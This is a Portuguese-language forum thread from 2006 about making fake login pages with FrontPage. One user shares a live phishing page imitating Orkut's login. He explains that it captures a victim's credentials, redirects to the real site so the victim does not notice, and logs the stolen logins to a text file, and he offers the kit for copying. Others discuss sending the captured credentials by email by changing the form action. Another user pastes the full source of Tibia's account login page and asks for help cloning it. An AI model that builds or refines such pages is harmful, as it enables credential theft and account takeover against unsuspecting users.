[Tutorial] Criando páginas falsas pelo FrontPage

Started by Fvox, 18 de June , 2006, 12:10:17 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

kmrafa

kara do orkut eu tenho esse..

http://www.erastoremix.com/orkut/orkut/glogin.php

e ele salva aki...na verdade o que ele faz eh na primeira vez, ele pega seu login mais n faz nada...ai ele atualiza a pagina..e entra na pagina mesmo do orkut...pela segunda vez.... as vezes a pessoa n repara..pensa q n foi e coloca o login de volta e entra como se n nada tivesse acontecido... só a diferença é que esse nao vai pro email.. ele vai para aqui.. http://www.erastoremix.com/orkut/orkut/ ... sadfas.txt

se quiser entrar em http://www.erastoremix.com/orkut e copiar tudo fique a vontade =)

Fvox

Quote from: "kmrafa"kara do orkut eu tenho esse..

http://www.erastoremix.com/orkut/orkut/glogin.php

e ele salva aki...na verdade o que ele faz eh na primeira vez, ele pega seu login mais n faz nada...ai ele atualiza a pagina..e entra na pagina mesmo do orkut...pela segunda vez.... as vezes a pessoa n repara..pensa q n foi e coloca o login de volta e entra como se n nada tivesse acontecido... só a diferença é que esse nao vai pro email.. ele vai para aqui.. http://www.erastoremix.com/orkut/orkut/ ... sadfas.txt

se quiser entrar em http://www.erastoremix.com/orkut e copiar tudo fique a vontade =)


Esse jeito eh bom tbm, mas o do e-mail fica mais privado..
"Achas que estás caindo na insanidade? Mergulhe."


kmrafa

é...é só trocar por um codigo pra envia pra email neh..

Fvox

Quote from: "kmrafa"é...é só trocar por um codigo pra envia pra email neh..

Trocar o que? oO
A form action? Sim
"Achas que estás caindo na insanidade? Mergulhe."


Anonymous

o tutorial ta bom, mas prefiro linha a linha eh mto melhor, e gravando num txt

Anonymous

#20
ow fvox eu queria q vc mi ajudace numa coisa

por exemplo se vc for no site do tibia

http://www.tibia.com/community/?subtopic=guilds

e botar exibir codico fonte vai aparece issu

<html>
<head>
<meta name="description" content="Tibia is a free massive multiplayer online role playing game. Join this fascinating game that has thousands of fans from all over the world! - http://www.tibia.com">
<meta name="author" content="CipSoft">
<meta name="keywords" content="graphical mud, rpg, game, fantasy, medieval, roleplaying game, mmorpg, massive multiplayer, online game, persistent online game, online world, persistent online world, massive multi-user, massive multi user, multi-user-dungeon, multiuser dungeon, internet game, online spiel, internet spiel, rollenspiel, multiplayer spiel, multiplayer game, free game, kostenloses spiel, free internet game, free online game">
<title>Tibia Community</title>
<link href="http://static.tibia.com/fonts.css" rel="stylesheet" type="text/css">
</head>

<script language="JavaScript" type="text/javascript">
<!--
  // Browser Typ definieren ie, n3, n4, n5, [empty] for other
  var browserTyp = "";
  var browserName = navigator.appName;
  var browserVersion = navigator.appVersion;
  if (navigator.appName=="Netscape" && navigator.appVersion<"4.0") browserTyp = "n3";
  if (navigator.appName=="Netscape" && navigator.appVersion>="4.0") browserTyp = "n4";
  if (navigator.appName=="Netscape" && navigator.appVersion>="5.0") browserTyp = "n5";
  if (navigator.appName=="Microsoft Internet Explorer") browserTyp = "ie";
  // Alles markieren
  function CheckAll(form_name, checkbox_name) {
    var form = document.getElementById(form_name);

    if (form.ALL) {
      var c = form.ALL.checked;
    }

    for (var i=0; i<form.elements.length; i++) {
      var e = form.elements[i];
      if (e.name != checkbox_name) continue;
      e.checked = c;
    }
  }
  //-->
</script>

<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!-- // Framekiller
setTimeout ("changePage()", 6000);
function changePage()
{
  if (parent.frames.length > 2) {
    if (browserTyp == "ie") {
      parent.location=document.location;
    } else {
      self.top.location=document.location;
    }
  }
}
// -->
</SCRIPT>

<SCRIPT LANGUAGE="JavaScript">
<!-- // Buttons
var js_buttons_out = new Array(15);
var js_buttons_on = new Array(15);
function preloadImages()
{
  if (browserTyp=="n3") return;
  if (document.images) {
    js_buttons_out[0] = new Image();
    js_buttons_out[0].src = "http://static.tibia.com/IMAGES/GLOBAL/button_home_off.gif";
    js_buttons_on[0] = new Image();
    js_buttons_on[0].src = "http://static.tibia.com/IMAGES/GLOBAL/button_home_on.gif";
    js_buttons_out[1] = new Image();
    js_buttons_out[1].src = "http://static.tibia.com/IMAGES/GLOBAL/button_guide_off.gif";
    js_buttons_on[1] = new Image();
    js_buttons_on[1].src = "http://static.tibia.com/IMAGES/GLOBAL/button_guide_on.gif";
    js_buttons_out[2] = new Image();
    js_buttons_out[2].src = "http://static.tibia.com/IMAGES/GLOBAL/button_library_off.gif";
    js_buttons_on[2] = new Image();
    js_buttons_on[2].src = "http://static.tibia.com/IMAGES/GLOBAL/button_library_on.gif";
    js_buttons_out[3] = new Image();
    js_buttons_out[3].src = "http://static.tibia.com/IMAGES/GLOBAL/button_community_off.gif";
    js_buttons_on[3] = new Image();
    js_buttons_on[3].src = "http://static.tibia.com/IMAGES/GLOBAL/button_community_on.gif";
    js_buttons_out[4] = new Image();
    js_buttons_out[4].src = "http://static.tibia.com/IMAGES/GLOBAL/button_service_off.gif";
    js_buttons_on[4] = new Image();
    js_buttons_on[4].src = "http://static.tibia.com/IMAGES/GLOBAL/button_service_on.gif";
    js_buttons_out[5] = new Image();
    js_buttons_out[5].src = "http://static.tibia.com/IMAGES/GLOBAL/button_statistics_off.gif";
    js_buttons_on[5] = new Image();
    js_buttons_on[5].src = "http://static.tibia.com/IMAGES/GLOBAL/button_statistics_on.gif";
    js_buttons_out[6] = new Image();
    js_buttons_out[6].src = "http://static.tibia.com/IMAGES/GLOBAL/button_forum_off.gif";
    js_buttons_on[6] = new Image();
    js_buttons_on[6].src = "http://static.tibia.com/IMAGES/GLOBAL/button_forum_on.gif";
    js_buttons_out[7] = new Image();
    js_buttons_out[7].src = "http://static.tibia.com/IMAGES/GLOBAL/button_guilds_off.gif";
    js_buttons_on[7] = new Image();
    js_buttons_on[7].src = "http://static.tibia.com/IMAGES/GLOBAL/button_guilds_on.gif";
    js_buttons_out[8] = new Image();
    js_buttons_out[8].src = "http://static.tibia.com/IMAGES/GLOBAL/button_character_off.gif";
    js_buttons_on[8] = new Image();
    js_buttons_on[8].src = "http://static.tibia.com/IMAGES/GLOBAL/button_character_on.gif";
    js_buttons_out[9] = new Image();
    js_buttons_out[9].src = "http://static.tibia.com/IMAGES/GLOBAL/button_tibiarules_off.gif";
    js_buttons_on[9] = new Image();
    js_buttons_on[9].src = "http://static.tibia.com/IMAGES/GLOBAL/button_tibiarules_on.gif";
    js_buttons_out[10] = new Image();
    js_buttons_out[10].src = "http://static.tibia.com/IMAGES/GLOBAL/button_gamemaster_off.gif";
    js_buttons_on[10] = new Image();
    js_buttons_on[10].src = "http://static.tibia.com/IMAGES/GLOBAL/button_gamemaster_on.gif";
    js_buttons_out[11] = new Image();
    js_buttons_out[11].src = "http://static.tibia.com/IMAGES/GLOBAL/button_houses_off.gif";
    js_buttons_on[11] = new Image();
    js_buttons_on[11].src = "http://static.tibia.com/IMAGES/GLOBAL/button_houses_on.gif";
    js_buttons_out[12] = new Image();
    js_buttons_out[12].src = "http://static.tibia.com/IMAGES/GLOBAL/button_convention_off.gif";
    js_buttons_on[12] = new Image();
    js_buttons_on[12].src = "http://static.tibia.com/IMAGES/GLOBAL/button_convention_on.gif";
    js_buttons_out[13] = new Image();
    js_buttons_out[13].src = "http://static.tibia.com/IMAGES/GLOBAL/button_voting_off.gif";
    js_buttons_on[13] = new Image();
    js_buttons_on[13].src = "http://static.tibia.com/IMAGES/GLOBAL/button_voting_on.gif";
    js_buttons_out[14] = new Image();
    js_buttons_out[14].src = "http://static.tibia.com/IMAGES/GLOBAL/button_fansites_off.gif";
    js_buttons_on[14] = new Image();
    js_buttons_on[14].src = "http://static.tibia.com/IMAGES/GLOBAL/button_fansites_on.gif";
  }
}
function highlightImage(mode,imageName,PictureNo)
{
  if (browserTyp=="n3") return;
  for (i=0; i<window.document.images.length; i++) {
    if (window.document.images[i].name == imageName) {
      if (mode==1) {
        if (js_buttons_out[PictureNo] != null)
          window.document.images[i].src = js_buttons_out[PictureNo].src;
      } else if (mode==2) {
        if (js_buttons_on[PictureNo] != null)
          window.document.images[i].src = js_buttons_on[PictureNo].src;
      }
    }
  }
}
// -->
</SCRIPT>

<body bgcolor=black topMargin=0 leftMargin=0 rightMargin=0 marginwidth=0 marginheight=0  onload="preloadImages()"  >

<table border=0 cellpadding=0 cellspacing=0 width=100% height=100%><tr>
<td bgcolor=black width=5%><img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=1 height=1 border=0></td>

<td bgcolor=black>

<table border=0 cellpadding=0 cellspacing=0 width=100%><tr>
<td bgcolor=#000000 width=220 height=64><img src="http://static.tibia.com/IMAGES/GLOBAL/header_left.jpg" width=220 height=64 border=0></td>
<td bgcolor=#262634 background="http://static.tibia.com/IMAGES/GLOBAL/header_middle.jpg" width=100% height=64 align=center>
<table border=0 cellpadding=0 cellspacing=0><tr>
<td><img src="http://static.tibia.com/IMAGES/GLOBAL/advert.gif" width=10 height=60 border=0></td>
<td valign=top width=468 height=60><img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=1 height=2 border=0><br>
<script type="text/javascript">
  <!--
  google_ad_client = "pub-7377798667395141";
  google_ad_width = 468;
  google_ad_height = 60;
  google_ad_format = "468x60_as";
  google_ad_type = "text_image";
  google_ad_channel ="";
  google_color_border = "336699";
  google_color_bg = "FFFFFF";
  google_color_link = "0000FF";
  google_color_url = "008000";
  google_color_text = "000000";
  //-->
</script>
<script type="text/javascript"
  src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</td>
</tr></table>
</td>
<td bgcolor=#000000 width=78 height=64 align=right><img src="http://static.tibia.com/IMAGES/GLOBAL/header_right.jpg" width=20 height=64 border=0></td>
</tr><tr>
<td bgcolor=#000000 height=1 colspan=3><img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=1 height=1 border=0></td>
</tr></table>

<table border=0 cellpadding=0 cellspacing=0 width=100%><tr>
<td bgcolor=#505050 background="http://static.tibia.com/IMAGES/GLOBAL/panel_top.jpg" width=130 height=31 rowspan=2 valign=top align=left>
<table border=0 cellpadding=0 cellspacing=0 width=122><tr><td width=122 align=center>
<A HREF="http://www.tibia.com/community/"><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_community_act.gif" WIDTH=98 HEIGHT=20 BORDER=0></A><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/small_seperator.gif" WIDTH=100 HEIGHT=8 BORDER=0><BR>
</td></tr></table>
<img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=130 height=1 border=0><BR>
</td>
<td bgcolor=#505050 background="http://static.tibia.com/IMAGES/GLOBAL/topic_background.jpg" width=100% height=20 align=center>
<table border=0 cellpadding=0 cellspacing=0 width=100%><tr align=center>
<TD><A HREF="http://www.tibia.com/home/" onMouseOut="highlightImage(1,'home',0)" onMouseOver="highlightImage(2,'home',0)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_home_off.gif" NAME="home" WIDTH=53 HEIGHT=20 BORDER=0></A></TD>
<TD><A HREF="http://www.tibia.com/guide/" onMouseOut="highlightImage(1,'guide',1)" onMouseOver="highlightImage(2,'guide',1)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_guide_off.gif" NAME="guide" WIDTH=50 HEIGHT=20 BORDER=0></A></TD>
<TD><A HREF="http://forum.tibia.com/forum/" onMouseOut="highlightImage(1,'forum',6)" onMouseOver="highlightImage(2,'forum',6)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_forum_off.gif" NAME="forum" WIDTH=63 HEIGHT=20 BORDER=0></A></TD>
<TD><A HREF="http://www.tibia.com/community/" onMouseOut="highlightImage(1,'community',3)" onMouseOver="highlightImage(2,'community',3)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_community_off.gif" NAME="community" WIDTH=98 HEIGHT=20 BORDER=0></A></TD>
<TD><A HREF="http://www.tibia.com/library/" onMouseOut="highlightImage(1,'library',2)" onMouseOver="highlightImage(2,'library',2)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_library_off.gif" NAME="library" WIDTH=66 HEIGHT=20 BORDER=0></A></TD>
<TD><A HREF="http://www.tibia.com/service/" onMouseOut="highlightImage(1,'service',4)" onMouseOver="highlightImage(2,'service',4)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_service_off.gif" NAME="service" WIDTH=65 HEIGHT=20 BORDER=0></A></TD>
<TD><A HREF="http://www.tibia.com/statistics/" onMouseOut="highlightImage(1,'statistics',5)" onMouseOver="highlightImage(2,'statistics',5)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_statistics_off.gif" NAME="statistics" WIDTH=81 HEIGHT=20 BORDER=0></A></TD>
</tr></table>
</td>
</tr><tr>
<td bgcolor=#000000>
<table border=0 cellpadding=0 cellspacing=0 width=100%><tr>
<td width=100% background="http://static.tibia.com/IMAGES/GLOBAL/paper_top.gif" valign=top><img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=1 height=11 border=0></td>
<td background="http://static.tibia.com/IMAGES/GLOBAL/paper_topright.gif" valign=top><img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=12 height=11 border=0></td>
</tr></table>
</td>
</tr></table>

<table border=0 cellpadding=0 cellspacing=0 width=100%><tr>
<td bgcolor=#000000 background="http://static.tibia.com/IMAGES/GLOBAL/paper_left.gif" width=130 valign=top align=left>

<table bgcolor=#505050 border=0 cellpadding=0 cellspacing=0 width=130><tr>
<td background="http://static.tibia.com/IMAGES/GLOBAL/panel_middle.jpg" width=130 height=64 valign=top align=left>
<table border=0 cellpadding=0 cellspacing=0 width=122><tr><td valign=top align=center>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/seperator.gif" WIDTH=120 HEIGHT=8 BORDER=0><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=100 HEIGHT=5 BORDER=0><BR>
<A HREF="http://www.tibia.com/community/?subtopic=tibiarules" onMouseOut="highlightImage(1,'tibiarules',9)" onMouseOver="highlightImage(2,'tibiarules',9)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_tibiarules_off.gif" NAME="tibiarules" WIDTH=120 HEIGHT=20 BORDER=0></A><BR>
<A HREF="http://www.tibia.com/community/?subtopic=gamemaster" onMouseOut="highlightImage(1,'gamemaster',10)" onMouseOver="highlightImage(2,'gamemaster',10)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_gamemaster_off.gif" NAME="gamemaster" WIDTH=120 HEIGHT=20 BORDER=0></A><BR>
<A HREF="http://www.tibia.com/community/?subtopic=characters" onMouseOut="highlightImage(1,'character',8)" onMouseOver="highlightImage(2,'character',8)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_character_off.gif" NAME="character" WIDTH=120 HEIGHT=20 BORDER=0></A><BR>
<A HREF="http://www.tibia.com/community/?subtopic=guilds" onMouseOut="highlightImage(1,'guilds',7)" onMouseOver="highlightImage(2,'guilds',7)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_guilds_off.gif" NAME="guilds" WIDTH=120 HEIGHT=20 BORDER=0></A><BR>
<A HREF="http://www.tibia.com/community/?subtopic=houses" onMouseOut="highlightImage(1,'houses',11)" onMouseOver="highlightImage(2,'houses',11)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_houses_off.gif" NAME="houses" WIDTH=120 HEIGHT=20 BORDER=0></A><BR>
<A HREF="http://www.tibia.com/community/?subtopic=convention" onMouseOut="highlightImage(1,'convention',12)" onMouseOver="highlightImage(2,'convention',12)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_convention_off.gif" NAME="convention" WIDTH=120 HEIGHT=20 BORDER=0></A><BR>
<A HREF="http://www.tibia.com/community/?subtopic=voting" onMouseOut="highlightImage(1,'voting',13)" onMouseOver="highlightImage(2,'voting',13)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_voting_off.gif" NAME="voting" WIDTH=120 HEIGHT=20 BORDER=0></A><BR>
<A HREF="http://www.tibia.com/community/?subtopic=fansites" onMouseOut="highlightImage(1,'fansites',14)" onMouseOver="highlightImage(2,'fansites',14)" ><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/button_fansites_off.gif" NAME="fansites" WIDTH=120 HEIGHT=20 BORDER=0></A><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=100 HEIGHT=10 BORDER=0><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/seperator.gif" WIDTH=120 HEIGHT=8 BORDER=0><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=100 HEIGHT=3 BORDER=0><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/small_seperator.gif" WIDTH=100 HEIGHT=8 BORDER=0><BR>
</td></tr></table>
</td>
</tr><tr>
<td background="http://static.tibia.com/IMAGES/GLOBAL/panel_bottom.jpg" width=130 height=10><img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=130 height=10 border=0></td>
</tr></table>

<table border=0 cellpadding=0 cellspacing=0 width=122><tr>
<td valign=top align=center>

<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=100 HEIGHT=15 BORDER=0><BR>
<A HREF="http://www.tibia.com/home/?subtopic=about"><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/cipsoftlogo.gif" WIDTH=86 HEIGHT=27 BORDER=0></A><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=100 HEIGHT=15 BORDER=0><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/bar.gif" WIDTH=96 HEIGHT=5 BORDER=0><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=100 HEIGHT=2 BORDER=0><BR>
<A HREF="http://www.tibia.com/home/?subtopic=account"><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/myaccount.gif" WIDTH=83 HEIGHT=16 BORDER=0></A><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/bar.gif" WIDTH=96 HEIGHT=5 BORDER=0><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=100 HEIGHT=20 BORDER=0><BR>

<TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH=115>
<TR><TD ALIGN=middle>
<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0>
<TR><TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=8 HEIGHT=1 BORDER=0></TD><TD ALIGN=middle>
<A HREF="http://www.tibia.com/statistics/?subtopic=whoisonline" CLASS="blue">Players Online</A><BR><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=1 HEIGHT=3 BORDER=0><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/bar.gif" WIDTH=96 HEIGHT=5 BORDER=0><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=1 HEIGHT=3 BORDER=0><BR>
<A HREF="http://www.tibia.com/statistics/?subtopic=whoisonline" CLASS="blue">34328 players<BR>on 72 worlds</A><BR><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=1 HEIGHT=3 BORDER=0><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/bar.gif" WIDTH=96 HEIGHT=5 BORDER=0><BR>
<IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=1 HEIGHT=3 BORDER=0>
</TD><TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=8 HEIGHT=1 BORDER=0></TD></TR>
</TABLE>
</TD></TR>
</TABLE><BR>

<A HREF="http://www.tibiame.com"><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/tibiamebutton_ww.gif" WIDTH=92 HEIGHT=78 BORDER=0></A><BR>

</td></tr></table></td>

<script language="JavaScript" type="text/javascript">
<!--
  if (browserTyp=="ie" || browserTyp=="n5") {
    document.write("<td bgcolor=#FBEAD0 background=\"http://static.tibia.com/IMAGES/GLOBAL/paper_body.jpg\" width=100% valign=top>");
  } else {
    document.write("<td bgcolor=#FBEAD0 width=100% valign=top>");
  }
// --> <td bgcolor=#FBEAD0 background="http://static.tibia.com/IMAGES/GLOBAL/paper_body.jpg" width=100% valign=top>
<!--
// -->
</script>

<table border=0 cellpadding=0 cellspacing=20 width=100%>
<tr><td valign=top>
<TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0 WIDTH=100%><TR>
<TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=1 HEIGHT=1 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
<TD WIDTH=100%><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0 WIDTH=100%><TR>
<TD WIDTH=8><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/line_left.gif" WIDTH=8 HEIGHT=7 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
<TD WIDTH=100%><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/line_body.gif" WIDTH=100% HEIGHT=7 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
<TD WIDTH=8><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/line_right.gif" WIDTH=8 HEIGHT=7 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
</TR></TABLE></TD>
<TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=1 HEIGHT=1 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
</TR></TABLE>
<TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH=100%><TR>
<TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=10 HEIGHT=1 BORDER=0></TD>
<TD><IMG SRC="http://static.tibia.com/IMAGES/community/title_guilds.gif" WIDTH=300 HEIGHT=50></TD>
<TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=10 HEIGHT=1 BORDER=0></TD>
<TD>Log in to get more options.</TD>
<TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=10 HEIGHT=1 BORDER=0></TD>
</TR></TABLE>
<TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0 WIDTH=100%><TR>
<TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=1 HEIGHT=1 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
<TD WIDTH=100%><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0 WIDTH=100%><TR>
<TD WIDTH=8><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/line_left.gif" WIDTH=8 HEIGHT=7 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
<TD WIDTH=100%><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/line_body.gif" WIDTH=100% HEIGHT=7 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
<TD WIDTH=8><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/line_right.gif" WIDTH=8 HEIGHT=7 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
</TR></TABLE></TD>
<TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=1 HEIGHT=1 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
</TR></TABLE>
<BR><BR>
<TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH=100%><TR>
<TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=10 HEIGHT=1 BORDER=0></TD><TD>
  <TABLE border=0 cellpadding=0 cellspacing=0 width=100%><TR>
    <TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=10 HEIGHT=1 BORDER=0></TD>
    <TD><BR><BR>

        Please enter your account number and your password.<BR>
    If you do not have an account yet, simply <A HREF="?subtopic=signup">sign up</A> to get one.<BR><BR>

    <TABLE WIDTH=100% BORDER=0 CELLSPACING=1 CELLPADDING=4>
      <TR><TD BGCOLOR="#505050" CLASS=white><B>Account Login</B></TD></TR>
      <TR><TD BGCOLOR="#D4C0A1">

      <FORM ACTION="http://www.tibia.com/community/?subtopic=guilds" METHOD=post>
      <TABLE BORDER=0 CELLPADDING=1>
        <TR><TD>Account number:</TD><TD><INPUT TYPE=password NAME="ACCOUNTLOGIN_ACCOUNTID" SIZE=10 MAXLENGTH=10></TD></TR>
        <TR><TD>Password:</TD><TD><INPUT TYPE=password NAME="ACCOUNTLOGIN_PASSWORD" SIZE=30 MAXLENGTH=29></TD></TR>
      </TABLE>

      </TD></TR>
    </TABLE>
    <BR>
    <TABLE BORDER=0 WIDTH=100%>
      <TR><TD ALIGN=center><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=70 HEIGHT=1 BORDER=0><BR>
      </TD><TD ALIGN=center>
      <INPUT TYPE=hidden NAME=page VALUE=view>
<INPUT TYPE=hidden NAME=GuildName VALUE="Black Eyed Peas">
<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0><TR><TD>
<INPUT TYPE=image NAME="Submit" SRC="http://static.tibia.com/IMAGES/GLOBAL/sbutton_submit.gif" BORDER=0 WIDTH=120 HEIGHT=18>
</TD></TR></FORM></TABLE>
      </TD><TD ALIGN=center>
      <TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0><FORM ACTION=http://www.tibia.com/service/?subtopic=lostaccount METHOD=post><TR><TD>
<INPUT TYPE=image NAME="Account lost?" ALT="Account lost?" SRC="http://static.tibia.com/IMAGES/GLOBAL/sbutton_accountlost.gif" BORDER=0 WIDTH=120 HEIGHT=18>
</TD></TR></FORM></TABLE>
      </TD><TD ALIGN=center>
      <IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=70 HEIGHT=1 BORDER=0><BR>
      </TD></TR>
    </TABLE>

    </TD>
    <TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=10 HEIGHT=1 BORDER=0></TD>
    </TR>
  </TABLE>
  </TD><TD><IMG src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=10 HEIGHT=1 BORDER=0></TD>
</TR></TABLE>
<table border=0 cellpadding=0 cellspacing=0 width=100%>
<tr><td><img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=1 height=10 border=0 vspace=0></td></tr>
</table>

</td></tr></table></td>

<td background="http://static.tibia.com/IMAGES/GLOBAL/paper_right.gif" width=12 valign=top>
<img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=12 height=1 border=0></td>
</tr></table>

<table border=0 cellpadding=0 cellspacing=0 width=100%><tr>
<td bgcolor=#000000 background="http://static.tibia.com/IMAGES/GLOBAL/paper_left.gif" width=130 valign=top align=left>
<img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=130 height=1 border=0></td>
<td bgcolor=#FBEAD0 background="http://static.tibia.com/IMAGES/GLOBAL/paper_body.jpg" width=100% valign=top>


<table border=0 cellpadding=20 cellspacing=0 width=100%>
<tr><td align=middle>
<TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0 WIDTH=100%><TR>
<TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=1 HEIGHT=1 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
<TD WIDTH=100%><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0 WIDTH=100%><TR>
<TD WIDTH=8><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/line_left.gif" WIDTH=8 HEIGHT=7 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
<TD WIDTH=100%><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/line_body.gif" WIDTH=100% HEIGHT=7 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
<TD WIDTH=8><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/line_right.gif" WIDTH=8 HEIGHT=7 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
</TR></TABLE></TD>
<TD><IMG SRC="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" WIDTH=1 HEIGHT=1 BORDER=0 HSPACE=0 VSPACE=0 ALIGN=left></TD>
</TR></TABLE>
<img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=1 height=5 border=0 vspace=0><br>
<font size="1" face="verdana,arial,helvetica">
Page automatically generated on: Aug 05 2006, 03:02:01 CEST. Copyright by CipSoft GmbH. All rights reserved.<br>
<a href="http://www.tibia.com/home/?subtopic=about">About CipSoft</a> | <a href="http://www.tibia.com/service/?subtopic=legal&page=agreement">Service Agreement</a> | <a href="http://www.tibia.com/service/?subtopic=legal&page=privacy">Privacy Policy</a>
</font></td></tr></table>

</td><td background="http://static.tibia.com/IMAGES/GLOBAL/paper_right.gif" width=12 valign=top>
<img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=12 height=1 border=0></td>
</tr></table>

<table border=0 cellpadding=0 cellspacing=0 width=100% height=16><tr>
<td bgcolor=#000000 background="http://static.tibia.com/IMAGES/GLOBAL/paper_bottomleft.gif" valign=top>
<img src="http://static.tibia.com/IMAGES/GLOBAL/blank.gif" width=130 height=16 border=0 vspace=0></td>
